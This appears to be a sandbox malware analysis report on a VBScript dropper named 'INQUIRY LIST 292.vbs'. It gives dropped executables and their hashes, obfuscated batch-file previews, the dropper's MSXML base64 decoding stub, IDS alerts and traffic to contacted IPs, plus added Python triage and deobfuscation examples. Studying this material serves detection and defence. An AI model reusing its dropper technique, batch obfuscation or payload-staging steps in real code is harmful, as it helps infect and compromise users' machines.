                                                                                    Preview:.2i..,t...*..qE....Dr..B..-n..J...M..\...T...\..L...J..e..`..j...Q.J....x...c.Nv.n..V.Po..p...|3.;.%.{....G.*....@i.+*j.^..a6.e...?`..\.R..|..T0?..4...a..V7Gy...=...1..f....ml.6b...p...a.P....q....../....nO.F..gnc..l?d-&&}..s...A..?{......M.....(..\.l..B..Z..Jv..Y.<...?....0..:.....L..FT.V..{.SG$$..7.{....E.F.g.jq.$&o1cDi..l..d.:.c.......N...:.v....../.....~3.B.\a.](4..:j.."..VL...m..e.$&..[.T..Bj.5J.L.i.F..`:.aw.E.4....B..._.>..e.6...rN....%...%..D.A.......W$&.1.d.h...F.27...}.9... aH.....<.....n.C..J.v.x5...[>.$&...x:.JB..0s.....Z'.=...(.&$.L.:......)$$]....!.e.).M.p..p.d....m.:.;.Op...&$hL.70...l.....G]E..CTL.a..xH..a.K..*{.a.'..O....F...5]v&&.....^aB8......`..;.M..og....Vq..E..=U".K...c.]._..[..D.j?+,..b...f..V?=.8..y0..DKc.~`UV......3>Xp...../.Z......).^.T}....g.;.#.%.......-.&&D..p..n...@..Uvj.z-.64$&.E{...E..0..bz..S..a...k.mF..L.T...{).M/...y.U4..r....8..$&...m..)'`).%.k...g..P......hU."..$$...*p8....$$..&$..\=$&.c.....:L%..G..
                                                                                    Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):854016
                                                                                    Entropy (8bit):6.911818112914193
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:aAm99652dKVsiJ9Pu8BHTN3KxxcycdnawpVdAorkBK1zmQ7HDEKDmC/E:7oqcKmiJ88ZZsTzOlIWznHY
                                                                                    MD5:4692AEE744A1B1FAB794FF334A77A462
                                                                                    SHA1:E5F8E1B159208FF1898E08F5C6A81CD0F0953981
                                                                                    SHA-256:00140069B6C9F47F98C8E82B448D5F6ABDF33354B9BC6BECF4B61DF72F5ED184
                                                                                    SHA-512:0755FF15408DD053187B88ADC965FF88E71B0B22555000C488E15A415499E9598B9A361F9EF49BE066452970CECFC6ECBA302CFC956FA9419DDEFE1E2978B5D4
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 42%
                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................h..........Tw............@..............................................@..............................t$...........................0...^........................... .......................................................text...._.......`.................. ..`.itext.......p.......d.............. ..`.data................l..............@....bss.....6...............................idata..t$.......&..................@....tls....4................................rdata....... ......................@..@.reloc...^...0...`..................@..B.rsrc...............................@..@....................................@..@................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):4
                                                                                    Entropy (8bit):2.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Eyn:Ey
                                                                                    MD5:DC91AAD4ACB490E3A48C0FDC3B452AB0
                                                                                    SHA1:CE5A59131E32A7A6C1A0A02E878550EFAEB10DBC
                                                                                    SHA-256:08680581317723DB336F15D21AB3AEBD6AF9657FE7C9A91681A775FE035283B9
                                                                                    SHA-512:641993A30CEFDCDA7FA2BB7BE585D432CC053D889A4A7A47AF3D5C0D26156CE372078C19877C15310E7D286C5A6AA19A0D4DCD2866B1953A498FE69D489A5725
                                                                                    Malicious:false
                                                                                    Preview:54..
                                                                                    Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):175800
                                                                                    Entropy (8bit):6.631791793070417
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
                                                                                    MD5:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                    SHA1:2A001C30BA79A19CEAF6A09C3567C70311760AA4
                                                                                    SHA-256:BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                                                                                    SHA-512:C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:
• Filename: PI ITS15235 (2).doc, Detection: malicious
• Filename: PI ITS15235.doc, Detection: malicious
• Filename: PO#3_RKG367.bat, Detection: malicious
• Filename: ENQ-0092025.doc, Detection: malicious
• Filename: yxU3AgeVTi.exe, Detection: malicious
• Filename: ITT # KRPBV2663 .doc, Detection: malicious
• Filename: PI ITS15235.doc, Detection: malicious
• Filename: PO#5_Tower_049.bat, Detection: malicious
• Filename: HSBC_PAY.SCR.exe, Detection: malicious
• Filename: PO_B2W984.com, Detection: malicious
                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............|..8...,...@...@..@
                                                                                    Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                    File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Uhzauuil.PIF">), ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):104
                                                                                    Entropy (8bit):5.056115382653646
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMujJajSsbxjl0vn:HRYFVmTWDyzXjhExpWn
                                                                                    MD5:0D0F90D0A2305ACF72A1DFB57729A1CB
                                                                                    SHA1:E472CF44CDC1A662B5FF20072612C241F8D36453
                                                                                    SHA-256:989E6E47757F8F805E76B9ED25D7FA86276811FCC5A39704731FA0B2C6FF2DB8
                                                                                    SHA-512:AD28EB4F86B02DF6171CB8C4F1EEB5BAE87A4979EAC08781835C766C21A044BF8877B8D48733338A7F5A901CA93F833E5CD943A9FBEF534D146C9C17CDC7E0E6
                                                                                    Malicious:true
                                                                                    Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Uhzauuil.PIF"..IconIndex=975970..HotKey=77..
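The dropped file above is a plain Internet Shortcut whose URL is a file: reference to a .PIF in C:\Users\Public\Libraries, a local executable rather than a web address. The following is an added triage example for this report, not Joe Sandbox code and not part of the sample: it parses a .url file, extracts the file: target, and flags it when the target has an executable extension or sits in a world-writable staging directory. The input is the preview printed above with its CR/LF restored; the extension list, the staging-directory list, the function names and the second test input are this example's own assumptions. Where this shortcut is placed on disk (a Startup folder, for instance) is not shown on this page, so the check looks only at the target.

```python
"""Triage an Internet Shortcut (.url) that points at a local executable.

Added example for this report; it is not Joe Sandbox code or part of the sample.
The input is the .url preview printed above (CR/LF restored). The extension list
and the staging-directory list are this example's own assumptions.
"""
import configparser
import ntpath
import re
from typing import Optional
from urllib.parse import unquote

# Extensions the shell will execute when the shortcut is opened (assumed list).
EXEC_EXT = {".pif", ".exe", ".scr", ".com", ".bat", ".cmd", ".vbs", ".js", ".wsf", ".hta"}
# World-writable locations used for staging payloads (assumed list, lower-case).
STAGING_DIRS = ("c:\\users\\public\\", "c:\\programdata\\", "\\appdata\\local\\temp\\")

# The dropped .url exactly as previewed in the report, with ".." (CR LF) restored.
SAMPLE_URL_FILE = (
    "[InternetShortcut]\r\n"
    'URL=file:"C:\\\\Users\\\\Public\\\\Libraries\\\\Uhzauuil.PIF"\r\n'
    "IconIndex=975970\r\n"
    "HotKey=77\r\n"
)


def shortcut_target(url_text: str) -> Optional[str]:
    """Return the local path a file: shortcut opens, or None for non-file targets."""
    cfg = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cfg.read_string(url_text)
    if not cfg.has_section("InternetShortcut"):
        return None
    url = cfg.get("InternetShortcut", "URL", fallback="").strip()
    # Accept file:"C:\\x", file:///C:/x and file://C:/x, quoted or not.
    m = re.match(r'(?i)^file:(?://)?"?(.*?)"?$', url)
    if not m:
        return None
    target = unquote(m.group(1)).lstrip("/").replace("/", "\\")
    while "\\\\" in target:            # the sample doubles its backslashes
        target = target.replace("\\\\", "\\")
    return target


def assess(url_text: str) -> dict:
    """Flag shortcuts whose target is a local executable or lives in a staging dir."""
    target = shortcut_target(url_text)
    reasons = []
    if target is not None:
        low = target.lower()
        ext = ntpath.splitext(low)[1]
        if ext in EXEC_EXT:
            reasons.append(f"file: target with executable extension {ext}")
        if any(d in low for d in STAGING_DIRS):
            reasons.append("target is in a world-writable staging directory")
    return {"target": target, "suspicious": bool(reasons), "reasons": reasons}


if __name__ == "__main__":
    print(assess(SAMPLE_URL_FILE))
```

Run against the preview, assess() reports both reasons: the .pif extension and the C:\Users\Public\ location. A .url with an https: target is ignored, since the check is about shortcuts that launch local files.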
                                                                                    Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                    File Type:DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):11278
                                                                                    Entropy (8bit):4.653311201735178
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:aMDConKxnlt4iVNt4BIvf6hJyMCdvWr3YGjZq3W4ERrr83hGgPKnrJTFlmwu26:BDWxl+mymfbMAM83WMgguTFlj96
                                                                                    MD5:F82AEB3B12F33250E404DF6EC873DD1D
                                                                                    SHA1:BCF538F64457E8D19DA89229479CAFA9C4CCE12F
                                                                                    SHA-256:23B7417B47C7EFB96FB7CE395E325DC831AB2EE03EADDA59058D31BDBE9C1EA6
                                                                                    SHA-512:6F9D6DAEED78F45F0F83310B95F47CC0A96D1DB1D7F6C2E2485D7A8ECB04FEE9865EEC3599FEE2D67F3332F68A70059F1A6A40050B93EF44D55632C24D108977
                                                                                    Malicious:false
                                                                                    Preview:@echo off..@%..%e%....%c% .%h%.. ......%o%.o.....o..% %.........%o%....r....%f%.o........%f%.....%..s%..... ...%e% r.r.. ...%t%..........% %.... %"%.......%I%..........%F%..%X%o....r..%Q%...o.%=%. ...%s%o..%e%... %t%. o. .% %..%"%..%..%IFXQ%"%..%w%..%S%..... .%c%.....%t%..r.......%=%.%=%....%"%.....%..%IFXQ%"%or.....%d%.........%s%...%b%o.r%m% .....r...%U% .. ..o...%U%.o%u%.... .%r%.........%v%...r..%s%...... ...%%wSct%C%.......%l%..r.%o%....%a%..r....r%"%.....o....%..%IFXQ%"%... .o...%y% %h%r.%R%....
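The three dropped batch files previewed above (8214, 28538 and 11278 bytes) share one obfuscation: the real characters of each command are separated by %...% references whose names are never defined, so cmd.exe expands them to nothing, and helper variables such as kocp=sket  (note the trailing space) are defined so that keywords can be rebuilt piecewise. The following is an added deobfuscator for that pattern, not the dropped script and not Joe Sandbox code. It implements the batch-file percent expansion rules (undefined names vanish, %% is a literal percent sign, %name:~start,len% substrings, %name:old=new% replacement) and records each set "name=value" so later lines resolve. SAMPLE_BAT is constructed to mirror the previews with readable junk names; the real files use non-printable characters in those names. Argument references (%1, %~dp0) and the * form of replacement are not handled (an assumption of this example).

```python
"""Strip the %junk% padding used by the dropped .bat files and recover the commands.

Added example for this report; it is not the dropped script and not Joe Sandbox
code. In a batch file cmd.exe replaces %name% with the variable's value, or with
nothing when name is undefined, and supports %name:~start,len% substrings and
%name:old=new% replacement. SAMPLE_BAT below is constructed to mirror the
previews with readable junk names; the real files use non-printable characters.
Argument references (%1, %~dp0) and the * replacement form are not handled.
"""
import re

SET_RE = re.compile(r'^\s*@?set\s+"?([^="]+)=(.*?)"?\s*$', re.IGNORECASE)


def lookup(ref: str, env: dict) -> str:
    """Resolve one %ref% as cmd.exe would in a batch file (case-insensitive names)."""
    base, _, op = ref.partition(":")
    val = env.get(base.upper())
    if val is None:                       # undefined variable: the whole %..% vanishes
        return ""
    if op.startswith("~"):                # %var:~start,len%
        start, _, length = op[1:].partition(",")
        try:
            s = int(start or 0)
            n = int(length) if length else None
        except ValueError:
            return ""
        if s < 0:
            s = max(len(val) + s, 0)
        end = len(val) if n is None else (len(val) + n if n < 0 else s + n)
        return val[s:end]
    if "=" in op:                         # %var:old=new%, case-insensitive
        old, _, new = op.partition("=")
        return re.sub(re.escape(old), lambda _m: new, val, flags=re.IGNORECASE) if old else val
    return val


def expand(line: str, env: dict) -> str:
    """Percent expansion of one line: %% -> %, %ref% -> lookup, lone % dropped."""
    out, i = [], 0
    while i < len(line):
        if line[i] != "%":
            out.append(line[i])
            i += 1
        elif line.startswith("%%", i):
            out.append("%")
            i += 2
        else:
            j = line.find("%", i + 1)
            if j == -1:
                i += 1
            else:
                out.append(lookup(line[i + 1:j], env))
                i = j + 1
    return "".join(out)


def deobfuscate(script: str) -> list:
    """Expand every line in order, recording set "name=value" so later lines resolve."""
    env, clean = {}, []
    for raw in script.splitlines():
        line = expand(raw, env)
        m = SET_RE.match(line)
        if m:
            env[m.group(1).upper()] = m.group(2)
        if line.strip():
            clean.append(line)
    return clean


# Constructed stand-in for the dropped .bat previews (readable junk names).
SAMPLE_BAT = "\r\n".join([
    "@echo off",
    'set "kocp=sket "',
    '%ab%%kocp:~0,1%%cd%%kocp:~2%%ef%"XIni%gh%=%ij%%kocp:~0,1%%kocp:~2%"',
    '%XIni%"Dir%kl%=C:\\Users\\Public\\Libraries"',
    '%XIni%"Run=%mn%star%op%t "" "%Dir%\\Uhzauuil.PIF""',
    "%uv%%Run%%wx%",
])

if __name__ == "__main__":
    print("\n".join(deobfuscate(SAMPLE_BAT)))
```

The third line of SAMPLE_BAT shows why the helper variable is spelled sket rather than set: %kocp:~0,1% and %kocp:~2% yield s and et , so the keyword never appears literally in the file, yet the line expands to set "XIni=set " and from there every later command is assembled from %XIni%. Running the deobfuscated output is never necessary; the point is to read it.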
                                                                                    Process:C:\Windows\System32\wscript.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):854016
                                                                                    Entropy (8bit):6.911818112914193
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:aAm99652dKVsiJ9Pu8BHTN3KxxcycdnawpVdAorkBK1zmQ7HDEKDmC/E:7oqcKmiJ88ZZsTzOlIWznHY
                                                                                    MD5:4692AEE744A1B1FAB794FF334A77A462
                                                                                    SHA1:E5F8E1B159208FF1898E08F5C6A81CD0F0953981
                                                                                    SHA-256:00140069B6C9F47F98C8E82B448D5F6ABDF33354B9BC6BECF4B61DF72F5ED184
                                                                                    SHA-512:0755FF15408DD053187B88ADC965FF88E71B0B22555000C488E15A415499E9598B9A361F9EF49BE066452970CECFC6ECBA302CFC956FA9419DDEFE1E2978B5D4
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 42%
                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................h..........Tw............@..............................................@..............................t$...........................0...^........................... .......................................................text...._.......`.................. ..`.itext.......p.......d.............. ..`.data................l..............@....bss.....6...............................idata..t$.......&..................@....tls....4................................rdata....... ......................@..@.reloc...^...0...`..................@..B.rsrc...............................@..@....................................@..@................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):119033
                                                                                    Entropy (8bit):5.148072354937474
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:BDzIi47phID3zvyDXthSmsVBc2w5jEjISsnEICl7MbiRwRkSYJQ:BDz47pq/6hShc2ljISsnEGRkSYJQ
                                                                                    MD5:A88976A70AED45F610A032E438A82A95
                                                                                    SHA1:EC20B0F0D6CCC848C8FFA857AB4E771672DFA4F2
                                                                                    SHA-256:F3D5A6EBCD8CAB3CC9A98488B23C2DE740C6EF04E33ED317A3E2A047D53D169B
                                                                                    SHA-512:EC77BB81B9E6DE4AF8A17EB26281D10FC9A05947D588F2EE3680ADA67ED28118FBC9A2D0E63BF0ECC2A4C318555A4F27E72ECF1A530A506E9B4FBF5EFDB4F676
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 61%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......g.d........& .....(...$................<a.............................0.......s........ .........................................@....................`..p...............\........................... ...(.................................................... ....'.......(.................. .P`. ...P....@......................@.p.. .......P.......4..............@.P@. ..p....`.......:..............@.0@. ..0....p.......>..............@.0@. ..................................p.. ..@............B..............@.0@. ...............D..............@.0.. ....X............L..............@.@.. ....h............N..............@.`.. ..\............P..............@.0B/4...................R..............@.PB/19..................V..............@..B/31.....%...........................@..B/45.....q...........................@..B/57.....
                                                                                    Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):96448
                                                                                    Entropy (8bit):5.1636650991276305
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:dhJfbGY/Bn623Kvv0IzGJyyu2xXibswbTYTjULf1YrfspZPgpzF:dhJfbG6B6yKvv0uWyyu2xXibswbQjUjs
                                                                                    MD5:869640D0A3F838694AB4DFEA9E2F544D
                                                                                    SHA1:BDC42B280446BA53624FF23F314AADB861566832
                                                                                    SHA-256:0DB4D3FFDB96D13CF3B427AF8BE66D985728C55AE254E4B67D287797E4C0B323
                                                                                    SHA-512:6E775CFB350415434B18427D5FF79B930ED3B0B3FC3466BC195A796C95661D4696F2D662DD0E020C3A6C3419C2734468B1D7546712ECEC868D2BBFD2BC2468A7
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R#.<p.<p.<p..p.<p..?q.<p..9q.<p..=q.<p.=p..<p..4q.<p..8q.<p...p.<p..>q.<pRich.<p........................PE..d....C~..........."............................@.............................`....................... ...............................................@....... ..<....P...(...P..`.......T...........................0...@...........p...........`....................text.............................. ..`.imrsiv..................................rdata...[.......`..................@..@.data...............................@....pdata..<.... ......................@..@.didat..0....0....... ..............@....rsrc........@.......0..............@..@.reloc..`....P.......@..............@..B........................................................................................................................................................................
                                                                                    File type:ASCII text, with very long lines (65413), with CRLF line terminators
                                                                                    Entropy (8bit):5.782360851300279
                                                                                    TrID:
                                                                                      File name:INQUIRY LIST 292.vbs
                                                                                      File size:1'139'043 bytes
                                                                                      MD5:2f5edacbfdae7a51267deeb8e937bfec
                                                                                      SHA1:d0ce895b7a4e55fe7f12121878a5818850f1dc00
                                                                                      SHA256:07898f8cb7e07bd6b86fd09cfff5898eb246a44524b3dda7a39e3de32667490b
                                                                                      SHA512:fb8c8d268dd5f4b0c619213a0c36c3132574d04c8780eb4c5623af08c7aea7d12fdc1dcab4903908b099b2874a34f8d9804af746978a93af488a95a101d0d392
                                                                                      SSDEEP:24576:uR3Gv4DQo4o3Hj6R3EpqvdG5Np4kJL7a5ZKCmjLpvi:HBo4o3kE4w2kw5w4
                                                                                      TLSH:E2354878C276AD8603E856F80989D6C1EDB03BFFB0D1D7505D5C91A211BDD37AA288EC
                                                                                      File Content Preview:Option Explicit..dim D,E,b,p..Set D=CreateObject("Microsoft.XMLDOM")..Set E=D.createElement("t")..E.DataType="bin.base64"..E.Text="TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0g
                                                                                      Icon Hash:68d69b8f86ab9a86
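The File Content Preview above shows how the 1.1 MB script carries its payload: it creates a Microsoft.XMLDOM element, sets its DataType to "bin.base64" and places the encoded bytes in .Text, so MSXML does the decoding (the decoded bytes are normally read back through .nodeTypedValue). The base64 starts with TVpQ, which decodes to MZP, the DOS stub marker of Borland/Delphi binaries, consistent with the MZP previews of the dropped PE files. The following is an added example for this report, not the sample's own code and not Joe Sandbox code: it pulls the literal out of the .vbs text, decodes it offline and reads what the DOS/PE header says. The embedded input is the preview line from this report (CR/LF restored), which the report truncates in the middle of the literal; wrap_as_vbs() and minimal_pe_stub() are constructed helpers that exercise the complete case. A single string literal is assumed; droppers that build the blob by concatenation need their literals joined first.

```python
"""Carve the payload a VBScript dropper feeds to MSXML as bin.base64.

Added example for this report; it is neither the sample's own code nor Joe
Sandbox code. PREVIEW_VBS is the truncated "File Content Preview" from the
report; wrap_as_vbs() and minimal_pe_stub() are constructed for the complete
case. One string literal is assumed (no concatenation).
"""
import base64
import re
import struct

BIN_B64_RE = re.compile(r'\.DataType\s*=\s*"bin\.base64"', re.IGNORECASE)
TEXT_RE = re.compile(r'\.Text\s*=\s*"([A-Za-z0-9+/=]*)("?)', re.IGNORECASE)

# Truncated preview of INQUIRY LIST 292.vbs as printed in the report.
PREVIEW_VBS = (
    "Option Explicit\r\n"
    "dim D,E,b,p\r\n"
    'Set D=CreateObject("Microsoft.XMLDOM")\r\n'
    'Set E=D.createElement("t")\r\n'
    'E.DataType="bin.base64"\r\n'
    'E.Text="TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0g'
)


def carve_payload(script: str) -> dict:
    """Decode the bin.base64 literal and read what its DOS/PE header says."""
    if not BIN_B64_RE.search(script):
        return {"found": False}
    m = TEXT_RE.search(script)
    if not m:
        return {"found": False}
    b64, closing_quote = m.group(1), m.group(2)
    b64 = b64[: len(b64) - len(b64) % 4]          # drop an incomplete trailing quartet
    blob = base64.b64decode(b64)
    info = {
        "found": True,
        "complete": bool(closing_quote),          # literal was closed in the script
        "size": len(blob),
        "is_mz": blob[:2] == b"MZ",
        "delphi_stub": blob[:3] == b"MZP",        # Borland/Delphi DOS stub marker
        "e_lfanew": None,
        "pe_signature": None,
    }
    if len(blob) >= 0x40:
        off = struct.unpack_from("<I", blob, 0x3C)[0]
        info["e_lfanew"] = off
        info["pe_signature"] = len(blob) >= off + 4 and blob[off:off + 4] == b"PE\0\0"
    return info


def wrap_as_vbs(blob: bytes) -> str:
    """Constructed dropper skeleton in the same shape as the preview, for testing."""
    return (
        'Set D=CreateObject("Microsoft.XMLDOM")\r\n'
        'Set E=D.createElement("t")\r\n'
        'E.DataType="bin.base64"\r\n'
        'E.Text="' + base64.b64encode(blob).decode() + '"\r\n'
        "b=E.nodeTypedValue\r\n"
    )


def minimal_pe_stub() -> bytes:
    """A 68-byte fake image: MZ header with e_lfanew=0x40 followed by the PE signature."""
    hdr = bytearray(b"MZ" + b"\0" * 62)
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    return bytes(hdr) + b"PE\0\0"


if __name__ == "__main__":
    print(carve_payload(PREVIEW_VBS))
    print(carve_payload(wrap_as_vbs(minimal_pe_stub())))
```

On the truncated preview the carver reports an MZP image with complete=False and no PE signature, because only the first few dozen bytes are on the page; on a full copy of the .vbs it returns the whole dropped executable, which can then be hashed and compared with the dropped-file SHA-256 values listed in this report.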
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-16T08:29:14.702006+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49731 | 50.116.86.44 | 443 | TCP
2025-01-16T08:29:21.836380+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49732 | 193.122.6.168 | 80 | TCP
2025-01-16T08:29:34.882496+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49740 | 193.122.6.168 | 80 | TCP
2025-01-16T08:29:41.869304+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49742 | 193.122.6.168 | 80 | TCP
Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Jan 16, 2025 08:29:14.111828089 CET  49730        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:14.111877918 CET  443          49730      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:14.111985922 CET  49730        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:14.112142086 CET  49730        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:14.112188101 CET  443          49730      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:14.112242937 CET  49730        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:14.169728041 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:14.169785023 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:14.169858932 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:14.194222927 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:14.194257975 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:14.701926947 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:14.702006102 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:14.706237078 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:14.706257105 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:14.706608057 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:14.754345894 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:14.876135111 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:14.923340082 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:14.993937016 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:14.993956089 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:14.993963003 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:14.994112015 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:14.994146109 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.012958050 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.013102055 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.013120890 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.058350086 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.080363035 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.080374002 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.080499887 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.080522060 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.080643892 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.081338882 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.081346989 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.081397057 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.082144976 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.082154989 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.082304001 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.099576950 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.099589109 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.099678993 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.166759014 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.166768074 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.166907072 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.167515039 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.167524099 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.167618990 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.168021917 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.168097019 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.168107986 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.168118000 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.168184996 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.168266058 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.169027090 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.169184923 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.170008898 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.170126915 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.186346054 CET  443          49731      50.116.86.44  192.168.2.4
